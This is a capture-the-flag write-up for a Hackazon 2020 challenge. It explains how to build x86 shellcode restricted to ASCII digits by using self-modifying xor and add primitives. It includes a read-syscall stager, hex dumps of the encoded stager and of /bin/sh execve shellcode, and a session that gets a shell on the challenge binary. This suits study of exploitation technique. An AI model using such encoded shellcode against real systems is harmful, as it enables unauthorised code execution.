Numeric Shellcode
[+] Introduction
In December 2020 I competed in Deloitte’s Hackazon CTF competition. Over the course of 14 days they released multiple troves of challenges in various difficulties.
One of the final challenges to be released was called numerous presents.
This task immediately piqued my interest as it was tagged with the category
pwn
.
The challenge description reads:
600 POINTS - NUMEROUS PRESENTS
You deserve a lot of presents!
Note: The binary is running on a Ubuntu 20.04 container
with ASLR enabled. It is x86 compiled with the flags mentioned
in the C file. You can assume that the buffer for your shellcode
will be in eax.
Tip: use hardware breakpoints for debugging shellcode.
[+] Challenge code
The challenge is distributed as a .c
file with no accompanying reference binary.
Personally I’m not a big fan of this approach, the devil is in the details when
it comes to binary exploitation, but let’s have a look:
#include <stdio.h>
// gcc -no-pie -z execstack -m32 -o presents presents.c
unsigned char presents[123456] __attribute__ ((aligned (0x20000)));
int main(void) {
setbuf(stdout, NULL);
puts("How many presents do you want?");
printf("> ");
scanf("%123456[0-9]", presents);
puts("Loading up your presents..!");
((void(*)())presents)();
}
Alright, at least the invocation for gcc
is embedded as a comment, and the
challenge code itself is brief and and straight forward. There is a static
uninitialized buffer presents
that resides in the .bss
of the program. The
libc routine scanf
is used to fill this buffer and jump to it. There is one
catch though, the format-string used here is %123456[0-9]
. This uses the %[
specifier to restrict the allowed input to only the ASCII literals for the numbers
0
till 9
(0x30
-0x39
).
So essentially they are asking us to write a numeric only shellcode for x86 (not amd64). Is this even possible? There is plenty of supporting evidence to be found that this is possible when restricted to alpha-numeric characters, but what about numeric-only?
Long story short: yes it is definitely possible. In the remaining part of the article I will explain the approach I took. Unfortunately though, this is not a fully universal or unconstrained approach, but it is good enough™ for this particular scenario.
[+] Diving in
If we set up a clean Ubuntu 20.04 VM and apt install build-essential
and build
the provided source, we end up with a binary which has the presents
global
variable located at 0x08080000
. Examining the disassembly listing of main
we can see the function pointer invocation looks like this:
mov eax, 0x8080000
call eax
So indeed, like the challenge description suggested EAX
contains a pointer to
our input/shellcode.
So what kind of (useful) instructions can we generate with just 0x30-0x39
?
Instead of staring at instruction reference manuals and handy tables
for too long I opted to brute-force generate valid opcode permutations and disassemble+dedup them.
[+] Exclusive ORdinary Instructions
There was no easy instructions to do flow control with numerics only, let alone
a lot of the arithmetic. There was no way to use the stack (push/pop) as some kind
of scratchpad memory as is often seen with alphanumeric shellcoding. Let’s look
at some obviously useful candidates though.. they are all xor
operations.
34 xx -> xor al, imm8
30 30 -> xor byte ptr [eax], dh
32 30 -> xor dh, byte ptr [eax]
32 38 -> xor bh, byte ptr [eax]
35 xx xx xx xx -> xor eax, imm32
Ofcourse, any immediate operands have to be in the 0x30-0x39
range as well. But
these instructions provide a nice starting point. xor byte ptr [eax], dh
can be used to (self-)modify
code/data if we manage to point eax
to the code/data we want to modify. Changing
eax arbitrarily is a bit tricky; but with the help of xor eax, imm32
and xor al, imm8
we can create quite a few usable addresses. (More on this in a bit)
Writing numeric only shellcode is all about expanding your arsenal of primitives,
in a way that eventually yields a desired end result. If we were to start mutating
opcodes/instructions using the xor [eax], dh
primitive, we need to have a useful
value in dh
first.
[+] Bootstrapping
If we look at the register contents of ebx
and edx
in the context of this
particular challenge, we see that ebx
points to the start of the .got.plt
section (0x0804c000
) and edx
is clobbered with the value 0xffffffff
at the time the trampoline instruction (call eax
) to our shellcode is being
executed.
In short, bh
= 0xc0
and dh
= 0xff
.
If we start our journey like this:
xor byte ptr [eax], dh ; *(u8*)(eax) ^= 0xff (== 0xcf)
xor dh, byte ptr [eax] ; dh ^= 0xcf (== 0x30)
xor bh, byte ptr [eax] ; bh ^= 0xcf (== 0x0f)
We end up with some (what I would call) useful values in both dh
and bh
. What
exactly makes 0x30
and 0x0f
useful though? Well for one, by xor’ing
numeric code with 0x30
we can now (relatively) easily introduce the values 0x00
-0x09
.
To be able to arbitrarily carve certain bytes in memory I picked a method that relies
on basic add
arithmetic. add byte ptr [eax], dh
and add byte ptr [eax], bh
are
almost numeric only. They start with a 0x00
opcode byte though. But this value
can now be carved by xor’ing with dh
, which contains 0x30
.
Here it becomes useful that we have a value in dh
which only has bits set in the
upper nibble, and a value in bh
which only has bits set in the lower nibble.
By combining a (reasonable!) amount of add
arithmetic using bh
and dh
as
increment values we can carve any value we want.
So let’s say we want to produce the value 0xCD
(CD 80
happens
to be a useful sequence of bytes when writing x86/Linux shellcode ;-)).
start value = 0x31
0x31 + (0x30 * 2) = 0x91
0x91 + (0x0f * 4) = 0xcd
as you can see, with a total of 6
add operations (2 with bh
and 4 with bh
)
we can easily construct the value 0xCD
if we start with a numeric value of
0x31
. It is fine if we overflow, we are only working with 8bit registers.
[+] Pages and overall structure
Having the ability to turn numeric bytes into arbitrary bytes is a useful capability,
but it heavily relies on being able to control eax
to pick what memory locations
are being altered.
Let’s try to think about our eax
-changing capabilities for a bit. We have the
xor eax, imm32
and xor al, imm8
instructions at our disposal. Of course, the
supplied operands to these instructions need to be in the numeric range.
By chaining two xor eax, imm32
operations it becomes possible to set a few
nibbles in EAX to arbitrary values, while not breaking the numeric-only rule
for the operands. By adding an optional xor al, 0x30
to the end we can toggle
the upper nibble of the least significant byte of eax to be 0x30
. This gives us
a nice range of easily selectable addresses.
A quick example would look something like this:
; eax = 0x08080000, our starting address
xor eax, 0x30303130 ; eax = 0x38383130
xor eax, 0x30303030 ; eax = 0x08080100
xor al, 0x30 ; eax = 0x08080130
Lets treat the lower 16bits of eax as our selectable address space, we have the
ability to select addresses in the form of 0x08080xyz
where x
and z
can be
anything between 0
and f
and y
can be either 3
or 0
. In essence, we
can easily increase/decrease eax
with a granularity of 0x100
and within
each 0x100
-sized page (from here on, page
) we can select addresses 00-0f
and 30-3f
.
I came up with a structure for the shellcode where each page starts with code that
patches code in the same page at offset 0x30
and higher, and the code at offset 0x30
and higher in the page then patches the final shellcode. Indeed, we’re using self-modifying
code that needs to be self-modified before it can self-modify (yo dawg).
Roughly, the layout of our pages look like this:
000: setup code
100: page_patcher_code_0 (patches shellcode_patcher_code_0)
130: shellcode_patcher_code_0 (patches shellcode)
200: page_patcher_code_1 (patches shellcode_patcher_code_1)
230: shellcode_patcher_code_1 (patches shellcode)
...
f00: shellcode that gets modified back into original form
This means we can have a maximum of up to 14
patch pages (we lose page 0
to setup code), which doesn’t allow us to use very big shellcodes. However, as it turns out, this is enough for a
read(stdin, buffer, size)
syscall, which was good enough to beat this challenge,
and (in general) is enough for staging a larger shellcode.
[+] Padding
With our limited addressing there’s quite a bit of ‘dead’ space we can’t easily
address for modifying. We’ll have to find some numeric-only nop
operation so we
can slide over these areas. Most of our numeric instructions are exactly 2 bytes,
except for xor eax, imm32
which is 5 bytes. The xor eax, imm32
is always used
in pairs though, so our numeric code size is always evenly divisble by 2.
This means we can use a 2-byte nop
instruction and not run into any alignment
issues.
I picked cmp byte ptr [eax], dh
(38 30
) as my NOP instruction, as eax
always points to a mapped address, and the side-effects are mininmal. Another
option would’ve been to use the aaa
instruction (37
), which is exactly 1 byte
in size. But it clobbers al
in some cases, so I avoided it.
[+] Putting it all together
Initially while I was developing this method I manually put together these self modifying numeric only contraptions (well, with some help of GNU assembler macro’s).. which works but is quite a painful and error prone process.
Eventually I implemented all the details in an easy to use python script, numeric_gen.py. This tool takes care of finding the right xor masks for address selection, and calculating the optimal amount of mutation instructions for generating the shellcode.
Do note, this tool was written with the challenge I was facing. You’ll want to
modify the three constants (EDX
, EBX
, EAX
) at the top if you plan to reuse
my exact tooling.
[+] Popping a shell
So we’ll write a quick stager shellcode that is compact enough to be num-only-ified.
It will use the read
syscall to read the next stage of shellcode from stdin. We’ll
put the destination buffer right after the stager itself, so there’s no need for trailing
nop instructions or control flow divertion. The careful reader will notice I’m
not setting edx
(which contains the size
argument for the read syscall) here
since its already set to a big enough value.
bits 32
global _start
_start:
mov ecx, eax ; ecx = eax
add ecx, 0xd ; ecx = &_end
xor ebx, ebx ; stdin
xor eax, eax
xor al, 3 ; eax = NR_read
int 0x80
_end:
That should do the trick. Time to run it through the tool and give it a shot.
$ nasm -o stager.bin stager.asm
$ xxd stager.bin
00000000: 89c1 83c1 0d31 db31 c034 03cd 80 .....1.1.4...
$ python3 numeric_gen.py stager.bin stager_num.bin
[~] total patch pages: 14
[>] wrote numeric shellcode to 'stager_num.bin'
[~] old length: 13 bytes, new length 3853 (size increase 29638.46%)
$ xxd stager_num.bin
00000000: 3030 3230 3238 3530 3030 3035 3031 3030 0020285000050100
00000010: 3830 3830 3830 3830 3830 3830 3830 3830 8080808080808080
00000020: 3830 3830 3830 3830 3830 3830 3830 3830 8080808080808080
00000030: 3830 3830 3830 3830 3830 3830 3830 3830 8080808080808080
...
00000ee0: 3830 3830 3830 3830 3830 3830 3830 3830 8080808080808080
00000ef0: 3830 3830 3830 3830 3830 3830 3830 3830 8080808080808080
00000f00: 3931 3531 3231 3031 3034 3431 32 9151210104412
$ xxd binsh.bin
00000000: 31c0 89c2 5068 6e2f 7368 682f 2f62 6989 1...Phn/shh//bi.
00000010: e389 c1b0 0b52 5153 89e1 cd80 .....RQS....
$ (cat stager_num.bin; sleep 1; cat binsh.bin; cat -) | ./presents
How many presents do you want?
> Loading up your presents..!
id
uid=1000(vagrant) gid=1000(vagrant) groups=1000(vagrant)
echo w00t
w00t
^C
Success! As you can see our final numeric shellcode weighs in at 3853 bytes. A little under 4KiB, and well within the allowed limit of 123456 characters.
[+] Closing words
I hope you enjoyed this article, and I’m eager to hear what improvements others can come up with. Right now this is not a fully generic approach, and I have no personal ambitions to turn it into one either. Things like shellcode encoding are mostly a fun party trick anyway these days. ;-)
– blasty